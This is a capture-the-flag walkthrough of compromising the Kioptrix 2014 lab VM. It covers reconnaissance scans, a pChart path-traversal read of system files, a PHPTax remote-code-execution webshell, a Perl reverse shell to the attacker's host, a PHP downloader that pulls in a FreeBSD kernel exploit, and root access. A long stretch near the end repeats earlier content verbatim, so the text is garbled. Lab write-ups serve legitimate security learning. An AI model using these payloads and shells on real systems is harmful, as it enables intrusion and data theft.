This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of the VM Kioptrix 2014 from Vulnhub - a site dedicated to penetration testing Capture The Flag challenges.
Download the VM from here: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
Scenario:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.137
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.137
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.137
dirb http://192.168.180.137
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ
smbclient -N -L 192.168.180.137
enum4linux -a 192.168.180.137
nikto -h 192.168.180.137
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.180.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.180.2 00:50:56:f9:f6:4a 1 60 VMware, Inc.
192.168.180.137 00:0c:29:6c:0a:ef 1 60 VMware, Inc.
192.168.180.254 00:50:56:ea:51:b8 1 60 VMware, Inc.
nmap -sV -T4 -O -F --version-light 192.168.180.137
Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-13 01:53 EDT
Nmap scan report for 192.168.180.137
Host is up (0.00021s latency).
Not shown: 97 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:6C:0A:EF (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.77 seconds
dirb http://192.168.180.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jul 13 02:11:19 2016
URL_BASE: http://192.168.180.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.180.137/ ----
+ http://192.168.180.137/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.180.137/index.html (CODE:200|SIZE:152)
-----------------
END_TIME: Wed Jul 13 02:11:43 2016
DOWNLOADED: 4612 - FOUND: 2
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer *
********************************************************
Target: http://192.168.180.137/FUZZ
Total requests: 3036
==================================================================
ID Response Lines Word Chars Request
==================================================================
00527: C=403 8 L 22 W 210 Ch "cgi-bin/"
..."
03027: C=404 7 L 24 W 206 Ch "champion"..."
Fatal exception: Pycurl error 7: Failed to connect to 192.168.180.137 port 80: Connection timed out
None
nikto -h 192.168.180.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.180.137
+ Target Hostname: 192.168.180.137
+ Target Port: 80
+ Start Time: 2016-07-13 02:17:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2016-07-13 02:18:53 (GMT-4) (67 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Source of index:
<html>
<head>
<!--
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
-->
</head>
<body>
<h1>It works!</h1>
</body>
</html>
nikto -h 192.168.180.137:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.180.137
+ Target Hostname: 192.168.180.137
+ Target Port: 8080
+ Start Time: 2016-07-13 02:31:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
Here I really got annoyed because at seems the scan get's filtered. So I decided to switch the browser agent string:
Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0
Try 2:
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.137/FUZZ -H "Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0"
Also here
etc/nikto.conf
No luck. Let us go another path:
https://www.exploit-db.com/exploits/31173/
http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/ssh/ssh_host_rsa_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6FPh3YLGl3HJ64W5kcTmsHc4sAI7CMVlnLLoo71P/UYM12o8GWEqMkWWLdlyzN7w/Z2PfHnNw8D9lkSjqoKLpyi0nFLSX9NfKCcm2fec0N0/741kRrnmAv0xe6N939PjMPTilagFzmakkm2JE12D8X+29lcj1bDSzEAZalCC/gEOYIhJlZJhTVCGQEBT5Te4/H/jbFAEIvYYsg/rHJ9ssV4IU1ZY+TDf8CI+g/TcjQR9qJI+cyYJFTlKezjYZEkljOcrNXpqMrRB+taiJQBDx8OxRj1mFUO8gHd+NOgYYmicjOx6BODAP6Mvf7QR9ULNDK34oPAgpVvP56UNZaeOL root@testing
<html><title>PHPTAX by William L. Berggren 2003(c)</title>
<body bgcolor='777777' link='000000' vlink='000000' alink='000000'>
<table cellpadding='2' cellspacing='0' border='1' width='780' bgcolor='#999900'>
Let's have a peek in the apache conf file:
https://www.freebsd.org/doc/handbook/network-apache.html
In FreeBSD, the main Apache HTTP Server configuration file is installed as /usr/local/etc/apache2x/httpd.conf, where x represents the version number.
http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
I have found instructions to change the user agent here: http://www.brighthub.com/internet/google/articles/90768.aspx
HOWTO: Change User Agent in Firefox/Iceweasel
Open the internal browser page about:config
Acknowledge the warranty warning (“I’ll be carefull…”)
Right-click → “New” → “String”
An dialog box opens that asks for the name of the new string. Give it the name general.useragent.override .
Set its value to the user agent string you wish to be sent, e.g. Mozilla/5.0 to hide the Firefox version, the operating system you’re using and the language of your browser.
This exploit did not work so, let us try manually:
https://www.exploit-db.com/exploits/25849/
http://192.168.180.137:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru%28%24_GET[cmd]%29%3B%3F%3E
http://192.168.180.137:8080/phptax/data/rce.php?cmd=id
uid=80(www) gid=80(www) groups=80(www)
em0: flags=8843 metric 0 mtu 1500 options=9b ether 00:0c:29:6c:0a:ef inet 192.168.180.137 netmask 0xffffff00 broadcast 192.168.180.255 nd6 options=29 media: Ethernet autoselect (1000baseT ) status: active plip0: flags=8810 metric 0 mtu 1500 nd6 options=29 lo0: flags=8049 metric 0 mtu 16384 options=3 inet6 ::1 prefixlen 128 inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3 inet 127.0.0.1 netmask 0xff000000 nd6 options=21 ipfw0: flags=8801 metric 0 mtu 65536 nd6 options=21
http://192.168.180.137:8080/phptax/data/rce.php?cmd=cat%20/etc/ipfw.rules
#!/bin/sh ipfw -q -f flush cmd="ipfw -a add" pif="em0" # Hopefully DNS and DHCP stuff won't be blocked $cmd 0001 allow tcp from any to me 53 out via $pif setup keep-state $cmd 0002 allow udp from any to me 53 out via $pif keep-state $cmd 0003 allow log udp from any to me 67 out via $pif keep-state $cmd 0004 allow log udp from any to me 68 out via $pif keep-state $cmd 0010 allow all from any to any via lo0 $cmd 0020 allow tcp from any to any 80 out via $pif setup keep-state $cmd 0030 allow tcp from any to any 443 out via $pif setup keep-state $cmd 0040 allow tcp from any to any out setup keep-state # Deny ICMP requests $cmd 0100 deny icmp from any to any via $pif # Allow SSH and HTTP requests $cmd 0200 allow tcp from any to me 22 in via $pif setup limit src-addr 2 $cmd 0201 allow tcp from any to me 80 in via $pif setup limit src-addr 2 $cmd 0201 allow tcp from any to me 8080 in via $pif setup limit src-addr 2 # Attempt to stop OS finger printing ipfw add 780 deny log tcp from any to any 0 in via en0 setup keep-state ipfw add 781 deny log udp from any to any 0 in via en0 keep-state # Deny everything else and log $cmd 0999 deny log all from any to any
nc, wget,curl did not work
http://192.168.180.137:8080/phptax/data/rce.php?cmd=perl%20-v
http://192.168.180.137:8080/phptax/data/rce.php?cmd=ps%20aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 11 98.0 0.0 0 16 ?? RL 7:26AM 35:48.34 [idle] root 0 0.0 0.0 0 160 ?? DLs 7:26AM 0:00.03 [kernel] root 1 0.0 0.1 6280 604 ?? ILs 7:26AM 0:00.00 /sbin/init -- root 2 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [mpt_recovery0] root 3 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [fdc0] root 4 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [sctp_iterator] root 5 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [xpt_thrd] root 6 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagedaemon] root 7 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [vmdaemon] root 8 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagezero] root 9 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [bufdaemon] root 10 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [audit] root 12 0.0 0.0 0 224 ?? WL 7:26AM 0:01.58 [intr] root 13 0.0 0.0 0 48 ?? DL 7:26AM 0:00.39 [geom] root 14 0.0 0.0 0 16 ?? DL 7:26AM 0:00.05 [yarrow] root 15 0.0 0.0 0 16 ?? DL 7:26AM 0:00.06 [syncer] root 16 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [vnlru] root 17 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [softdepflush] root 105 0.0 0.1 10060 1212 ?? Is 7:26AM 0:00.00 adjkerntz -i root 559 0.0 0.2 10052 1576 ?? Is 7:26AM 0:00.00 dhclient: em0 [ _dhcp 625 0.0 0.2 10052 1712 ?? Is 7:26AM 0:00.00 dhclient: em0 ( root 641 0.0 0.3 10372 3488 ?? Is 7:26AM 0:00.00 /sbin/devd root 833 0.0 0.2 12184 1628 ?? Is 7:26AM 0:00.00 /usr/sbin/syslo root 977 0.0 0.2 10056 1560 ?? I 7:26AM 0:00.00 /usr/local/osse ossec 981 0.0 0.3 10052 3404 ?? S 7:26AM 0:00.59 /usr/local/osse root 985 0.0 0.2 10052 1628 ?? S 7:26AM 0:00.02 /usr/local/osse root 989 0.0 0.2 10052 2128 ?? S 7:26AM 0:00.84 /usr/local/osse ossec 993 0.0 0.2 10052 1800 ?? S 7:26AM 0:00.00 /usr/local/osse mysql 1098 0.0 0.2 14636 1964 ?? Is 7:26AM 0:00.00 /bin/sh /usr/lo mysql 1178 0.0 4.6 219884 47144 ?? I 7:26AM 0:00.31 /usr/local/libe root 1192 0.0 1.3 206796 13556 ?? Ss 7:26AM 0:00.13 /usr/local/sbin root 1220 0.0 0.4 20384 4116 ?? Ss 7:26AM 0:00.02 sendmail: accep smmsp 1224 0.0 0.4 20384 4128 ?? Is 7:26AM 0:00.00 sendmail: Queue root 1230 0.0 0.2 14260 1716 ?? Ss 7:26AM 0:00.00 /usr/sbin/cron www 1241 0.0 2.0 210892 20464 ?? S 7:26AM 0:00.09 /usr/local/sbin www 1242 0.0 2.1 210892 21756 ?? S 7:26AM 0:00.04 /usr/local/sbin www 1243 0.0 2.1 210892 21768 ?? S 7:26AM 0:00.03 /usr/local/sbin www 1244 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.03 /usr/local/sbin www 1245 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin root 1277 0.0 0.4 26372 3876 ?? I 7:26AM 0:00.77 /usr/local/lib/ www 1353 0.0 2.1 210892 21768 ?? S 7:28AM 0:00.12 /usr/local/sbin www 1494 0.0 1.4 206796 14536 ?? I 7:56AM 0:00.00 /usr/local/sbin www 1525 0.0 0.1 14328 1476 ?? R 8:03AM 0:00.00 ps aux root 1294 0.0 7.4 111632 76688 v0- S 7:26AM 0:38.15 /usr/local/bin/ root 1337 0.0 0.1 12184 1372 v0 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1338 0.0 0.1 12184 1372 v1 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1339 0.0 0.1 12184 1372 v2 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1340 0.0 0.1 12184 1372 v3 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1341 0.0 0.1 12184 1372 v4 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1342 0.0 0.1 12184 1372 v5 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1343 0.0 0.1 12184 1372 v6 Is+ 7:26AM 0:00.00 /usr/libexec/ge root 1344 0.0 0.1 12184 1372 v7 Is+ 7:26AM 0:00.00 /usr/libexec/ge
Let's try with perl
http://192.168.180.137:8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socket::INET%28PeerAddr,%22192.168.180.132:443%22%29;STDIN-%3Efdopen%28$c,r%29;$~-%3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
On our end:
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.137] 30456
whoami
www
ps -aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 11 98.0 0.0 0 16 ?? RL 7:26AM 69:10.59 [idle]
root 1294 1.0 7.5 111632 76844 v0- S 7:26AM 1:13.97 /usr/local/bin/
root 0 0.0 0.0 0 160 ?? DLs 7:26AM 0:00.04 [kernel]
root 1 0.0 0.1 6280 604 ?? ILs 7:26AM 0:00.00 /sbin/init --
root 2 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [mpt_recovery0]
root 3 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [fdc0]
root 4 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [sctp_iterator]
root 5 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [xpt_thrd]
root 6 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagedaemon]
root 7 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [vmdaemon]
root 8 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [pagezero]
root 9 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [bufdaemon]
root 10 0.0 0.0 0 16 ?? DL 7:26AM 0:00.00 [audit]
root 12 0.0 0.0 0 224 ?? WL 7:26AM 0:03.02 [intr]
root 13 0.0 0.0 0 48 ?? DL 7:26AM 0:00.47 [geom]
root 14 0.0 0.0 0 16 ?? DL 7:26AM 0:00.09 [yarrow]
root 15 0.0 0.0 0 16 ?? DL 7:26AM 0:00.12 [syncer]
root 16 0.0 0.0 0 16 ?? DL 7:26AM 0:00.01 [vnlru]
root 17 0.0 0.0 0 16 ?? DL 7:26AM 0:00.02 [softdepflush]
root 105 0.0 0.1 10060 1212 ?? Is 7:26AM 0:00.00 adjkerntz -i
root 559 0.0 0.2 10052 1576 ?? Is 7:26AM 0:00.00 dhclient: em0 [
_dhcp 625 0.0 0.2 10052 1712 ?? Is 7:26AM 0:00.01 dhclient: em0 (
root 641 0.0 0.3 10372 3488 ?? Is 7:26AM 0:00.00 /sbin/devd
root 833 0.0 0.2 12184 1628 ?? Is 7:26AM 0:00.01 /usr/sbin/syslo
root 977 0.0 0.2 10056 1560 ?? S 7:26AM 0:00.01 /usr/local/osse
ossec 981 0.0 0.3 10052 3404 ?? I 7:26AM 0:00.59 /usr/local/osse
root 985 0.0 0.2 10052 1628 ?? S 7:26AM 0:00.04 /usr/local/osse
root 989 0.0 0.2 10052 2128 ?? I 7:26AM 0:01.48 /usr/local/osse
ossec 993 0.0 0.2 10052 1800 ?? S 7:26AM 0:00.00 /usr/local/osse
mysql 1098 0.0 0.2 14636 1964 ?? Is 7:26AM 0:00.00 /bin/sh /usr/lo
mysql 1178 0.0 4.6 219884 47144 ?? I 7:26AM 0:00.55 /usr/local/libe
root 1192 0.0 1.3 206796 13556 ?? Ss 7:26AM 0:00.16 /usr/local/sbin
root 1220 0.0 0.4 20384 4116 ?? Ss 7:26AM 0:00.04 sendmail: accep
smmsp 1224 0.0 0.4 20384 4128 ?? Is 7:26AM 0:00.00 sendmail: Queue
root 1230 0.0 0.2 14260 1716 ?? Ss 7:26AM 0:00.01 /usr/sbin/cron
www 1241 0.0 2.0 210892 20464 ?? I 7:26AM 0:00.09 /usr/local/sbin
www 1242 0.0 2.1 210892 21756 ?? I 7:26AM 0:00.04 /usr/local/sbin
www 1243 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin
www 1244 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin
www 1245 0.0 2.1 210892 21768 ?? I 7:26AM 0:00.04 /usr/local/sbin
root 1277 0.0 0.4 26404 3888 ?? I 7:26AM 0:01.48 /usr/local/lib/
www 1353 0.0 2.1 210892 21768 ?? I 7:28AM 0:00.12 /usr/local/sbin
www 1494 0.0 1.4 206796 14552 ?? S 7:56AM 0:00.01 /usr/local/sbin
www 1631 0.0 0.5 30260 5572 ?? S 8:34AM 0:00.00 perl -MIO -e $p
www 1643 0.0 0.1 14328 1472 ?? R 8:37AM 0:00.00 ps -aux
root 1337 0.0 0.1 12184 1372 v0 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1338 0.0 0.1 12184 1372 v1 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1339 0.0 0.1 12184 1372 v2 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1340 0.0 0.1 12184 1372 v3 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1341 0.0 0.1 12184 1372 v4 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1342 0.0 0.1 12184 1372 v5 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1343 0.0 0.1 12184 1372 v6 Is+ 7:26AM 0:00.00 /usr/libexec/ge
root 1344 0.0 0.1 12184 1372 v7 Is+ 7:26AM 0:00.00 /usr/libexec/ge
We already know from the passwd file that this is FreeBSD 9.00 so it is time to exploit:
https://www.exploit-db.com/exploits/28718/
We download the file with a this php I have prepared:
echo "<?php file_put_contents('28718.c', fopen('http://192.168.180.132/28718.c', 'r')); ?>" > down2.php
./28718
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
ls /root/
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log
Best Regards,
Yuriy Stanchev/URIX
References:
https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
No luck. Let us go another path:
https://www.exploit-db.com/exploits/31173/
http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/ssh/ssh_host_rsa_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6FPh3YLGl3HJ64W5kcTmsHc4sAI7CMVlnLLoo71P/UYM12o8GWEqMkWWLdlyzN7w/Z2PfHnNw8D9lkSjqoKLpyi0nFLSX9NfKCcm2fec0N0/741kRrnmAv0xe6N939PjMPTilagFzmakkm2JE12D8X+29lcj1bDSzEAZalCC/gEOYIhJlZJhTVCGQEBT5Te4/H/jbFAEIvYYsg/rHJ9ssV4IU1ZY+TDf8CI+g/TcjQR9qJI+cyYJFTlKezjYZEkljOcrNXpqMrRB+taiJQBDx8OxRj1mFUO8gHd+NOgYYmicjOx6BODAP6Mvf7QR9ULNDK34oPAgpVvP56UNZaeOL root@testing
<html><title>PHPTAX by William L. Berggren 2003(c)</title>
<body bgcolor='777777' link='000000' vlink='000000' alink='000000'>
<table cellpadding='2' cellspacing='0' border='1' width='780' bgcolor='#999900'>
Let's have a peek in the apache conf file:
https://www.freebsd.org/doc/handbook/network-apache.html
In FreeBSD, the main Apache HTTP Server configuration file is installed as /usr/local/etc/apache2x/httpd.conf, where x represents the version number.
http://192.168.180.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
I have found instructions to change the user agent here: http://www.brighthub.com/internet/google/articles/90768.aspx
HOWTO: Change User Agent in Firefox/Iceweasel
Open the internal browser page about:config
Acknowledge the warranty warning (“I’ll be carefull…”)
Right-click → “New” → “String”
An dialog box opens that asks for the name of the new string. Give it the name general.useragent.override .
Set its value to the user agent string you wish to be sent, e.g. Mozilla/5.0 to hide the Firefox version, the operating system you’re using and the language of your browser.
This exploit did not work so, let us try manually:
https://www.exploit-db.com/exploits/25849/
http://192.168.180.137:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru%28%24_GET[cmd]%29%3B%3F%3E
http://192.168.180.137:8080/phptax/data/rce.php?cmd=id
uid=80(www) gid=80(www) groups=80(www)
em0: flags=8843 metric 0 mtu 1500 options=9b ether 00:0c:29:6c:0a:ef inet 192.168.180.137 netmask 0xffffff00 broadcast 192.168.180.255 nd6 options=29 media: Ethernet autoselect (1000baseT ) status: active plip0: flags=8810 metric 0 mtu 1500 nd6 options=29 lo0: flags=8049 metric 0 mtu 16384 options=3 inet6 ::1 prefixlen 128 inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3 inet 127.0.0.1 netmask 0xff000000 nd6 options=21 ipfw0: flags=8801 metric 0 mtu 65536 nd6 options=21
http://192.168.180.137:8080/phptax/data/rce.php?cmd=cat%20/etc/ipfw.rules
